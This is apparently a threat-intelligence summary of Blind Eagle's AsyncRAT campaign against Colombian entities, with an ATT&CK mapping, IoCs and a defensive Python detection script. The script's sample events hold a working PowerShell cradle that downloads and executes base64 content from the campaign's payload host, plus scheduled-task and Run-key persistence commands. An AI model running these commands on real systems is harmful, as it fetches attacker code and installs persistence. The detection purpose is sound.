Blind Eagle Deploys Fake UUE Files and Fsociety to Target Colombia’s Judiciary, Financial, Public, and Law Enforcement Entities

Blind Eagle (APT-C-36) targeted Colombia and nearby Latin American entities with spear-phishing PDFs impersonating the DIAN tax authority to deploy a multi-stage infection chain, culminating in AsyncRAT payloads hosted via Discord. The campaign uses in-memory DLL loading, PowerShell/VBS-based execution, and DDNS/C2 infrastructure to achieve persistence and remote access.
#BlindEagle #AsyncRAT

Keypoints

  • APT-C-36 (Blind Eagle) has been active in Latin America, focusing on Colombia and Ecuador since at least 2019.
  • In a February campaign, the threat actor impersonated Colombia’s DIAN to target health, financial, law enforcement, and related government entities.
  • The initial access vector is spear-phishing with PDFs; the lure uses a real DIAN context but redirects to a malicious site via a masked link.
  • The weaponization stack includes PDFs, Visual Basic Scripts, .NET DLLs, and PowerShell, with payloads delivered from Discord and other web assets.
  • The payload chain culminates in the AsyncRAT family: a Fsociety DLL loaded in memory injects AsyncRAT into a host process via Process Hollowing, giving the actor remote access and persistence.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The initial vector is a PDF attachment sent by email. Quote: “…The initial vector for infection is typically a PDF attachment sent by email.”
  • [T1204.002] User Execution: Malicious File – The VBS script runs under wscript.exe when the user double-clicks the file. Quote: “The VBS script is executed via wscript.exe once the user double-clicks the file.”
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell fetches the next stage and executes its base64-decoded content. Quote: “First, PowerShell downloads and executes the decoded base64 content of hxxp://172.174.176[.]153/dll/Dll.ppam.”
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – Visual Basic Script tooling is used in the chain. Quote: “Visual Basic Scripts, .NET Assemblies injected in memory, Malicious DLLs, PowerShell”
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Command-line execution appears in the chain. Note that the supporting quote describes a powershell.exe command line rather than a cmd.exe invocation, so this mapping is inferred rather than directly evidenced by the text. Quote: “The final payload executed is powershell.exe, with the following command line parameters:”
  • [T1053.005] Scheduled Task/Job: Scheduled Task – When the executing user is an admin, AsyncRAT persists via schtasks.exe. Quote: “If the user who executed it was an admin, then AsyncRAT can create a scheduled task using the process schtasks.exe”
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – When the user is not an admin, AsyncRAT persists through a registry key that launches the binary at startup. Quote: “If the user is not an admin, then AsyncRAT can create a registry key to execute the binary every time the system is started.”
  • [T1055.012] Process Injection: Process Hollowing – The Fsociety DLL loads AsyncRAT in memory using Process Hollowing. Quote: “Fsociety DLL loads AsyncRAT in memory, passing two parameters: … and AsyncRAT payload. Fsociety DLL loads AsyncRAT in memory using the Process Hollowing technique.”
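The technique list above describes a chain whose stages are visible in endpoint telemetry: wscript.exe launching powershell.exe, a PowerShell cradle that downloads and base64-decodes the next stage, schtasks.exe /create persistence, and a Run-key write. The following is an added example of detection logic for those stages, written for this page and not taken from the BlackBerry report or any vendor product. It runs over constructed Sysmon-style process-creation and registry-set events (the field names, file paths, the svc.exe name and the exact cradle command line are all invented here); the IoCs are the defanged ones from the page, refanged before matching. The Run-key detection is deliberately done at the registry layer, since the report says AsyncRAT creates the key itself, so a detection keyed on reg.exe process creation could miss it.

```python
"""Behavioural detections for the Blind Eagle chain summarised above.

Added example, not code from the report or any vendor tool. Runs over
constructed Sysmon EID 1 (process) / EID 13 (registry) style events and flags:
  * wscript.exe spawning powershell.exe               (T1059.005 -> T1059.001)
  * a PowerShell cradle that downloads and base64-decodes content (T1059.001)
  * schtasks.exe /create persistence                   (T1053.005)
  * a value written under a Run key, caught at the registry layer because
    AsyncRAT can set it via the .NET API without spawning reg.exe (T1547.001)
  * any refanged IoC from the page appearing anywhere in an event
"""
import re
from ntpath import basename

# Indicators copied from the IoC section, defanged exactly as published.
DEFANGED_IOCS = [
    "hxxp://172.174.176[.]153/dll/Dll.ppam",
    "asy1543.duckdns.org",
    "46.246.86[.]3",
]


def refang(ioc: str) -> str:
    """Undo the usual defanging so indicators can be matched against telemetry."""
    ioc = re.sub(r"^hxxp", "http", ioc, flags=re.I)
    return ioc.replace("[.]", ".").replace("(dot)", ".").replace("[:]", ":")


IOCS = [refang(i).lower() for i in DEFANGED_IOCS]

# Constructed sample telemetry (not real logs); event indices are used below.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\u\Downloads\Asuntos_DIAN.vbs"'},
    {"type": "process", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": ("powershell.exe -NoP -W Hidden -Command \"IEX([Text.Encoding]::UTF8.GetString("
             "[Convert]::FromBase64String((New-Object Net.WebClient).DownloadString("
             "'http://172.174.176.153/dll/Dll.ppam'))))\"")},
    {"type": "process", "parent": r"C:\Users\u\AppData\Roaming\svc.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks.exe /create /f /sc onlogon /rl highest /tn svc /tr "C:\Users\u\AppData\Roaming\svc.exe"'},
    {"type": "registry", "image": r"C:\Users\u\AppData\Roaming\svc.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svc",
     "value": r"C:\Users\u\AppData\Roaming\svc.exe"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe notes.txt"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def _img(ev, key="image"):
    """Lower-cased file name of a Windows path field, tolerant of missing keys."""
    return basename(ev.get(key, "")).lower()


def script_host_spawns_powershell(ev):
    return (ev["type"] == "process" and _img(ev, "parent") in SCRIPT_HOSTS
            and _img(ev) == "powershell.exe")


def powershell_b64_download(ev):
    """PowerShell that both fetches remote content and handles base64 (cradle)."""
    cmd = ev.get("cmd", "")
    return (ev["type"] == "process" and _img(ev) == "powershell.exe"
            and re.search(r"FromBase64String|-e(c|nc|ncodedcommand)?\b", cmd, re.I) is not None
            and re.search(r"DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b",
                          cmd, re.I) is not None)


def schtasks_create(ev):
    return (ev["type"] == "process" and _img(ev) == "schtasks.exe"
            and re.search(r"/create\b", ev.get("cmd", ""), re.I) is not None)


def run_key_set(ev):
    return (ev["type"] == "registry"
            and re.search(r"\\CurrentVersion\\Run(Once)?\\", ev.get("key", ""), re.I) is not None)


def ioc_match(ev):
    haystack = " ".join(str(v) for v in ev.values()).lower()
    return any(ioc in haystack for ioc in IOCS)


RULES = {  # rule name -> (predicate, ATT&CK technique from the page's mapping)
    "script_host_spawns_powershell": (script_host_spawns_powershell, "T1059.005/T1059.001"),
    "powershell_b64_download": (powershell_b64_download, "T1059.001"),
    "schtasks_create": (schtasks_create, "T1053.005"),
    "run_key_set": (run_key_set, "T1547.001"),
    "ioc_match": (ioc_match, "IoC"),
}


def detect(events):
    """Return {rule_name: [indices of events that fired]} for every rule."""
    return {name: [i for i, ev in enumerate(events) if fn(ev)]
            for name, (fn, _) in RULES.items()}


if __name__ == "__main__":
    for name, idxs in detect(SAMPLE_EVENTS).items():
        print(f"{name:32} {RULES[name][1]:20} events={idxs}")
```

The behavioural rules fire on the sample regardless of the IoC list, which is the point: the IPs, hostnames and hashes on this page rotate between campaigns, while a script host spawning a download-and-decode PowerShell cradle and a fresh Run-key or scheduled-task entry from a user-writable path do not.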

Indicators of Compromise

  • [Hash] e4d2799f3001a531d15939b1898399b4 (MD5), fc85d3da6401b0764a2e8a5f55334a7d683ec20fb8210213feb6148f02a30554 (SHA-256) – Hashes for the first malicious PDF lure
  • [Hash] b432202cf7f00b4a4cbe377c284f3f28 (MD5), 6d9d0eb5e8e69ffe9914c63676d293da1b7d3b7b9f3d2c8035abe0a3de8b9fca (SHA-256) – Hashes for the later .uue package and its embedded components
  • [File name] Fv3608799004720042L900483000P19878099700001537012.pdf, Asuntos_DIAN_N6440005403992837L2088970004-01-02-2023-pdf.uue – Lure file names observed in the campaign
  • [Domain] asy1543.duckdns.org:1543 – DuckDNS C2 hostname and port used for AsyncRAT communications
  • [IP] 46.246.86[.]3, 46.246.12[.]6 – IP addresses resolved for the campaign's DuckDNS/C2 infrastructure
  • [URL] hxxp://172.174.176[.]153/dll/Dll.ppam – Remote payload download URL fetched in the PowerShell stage
  • [URL] hxxp://172.174.176[.]153/ – Web server hosting the payloads used during the infection

Read more: https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia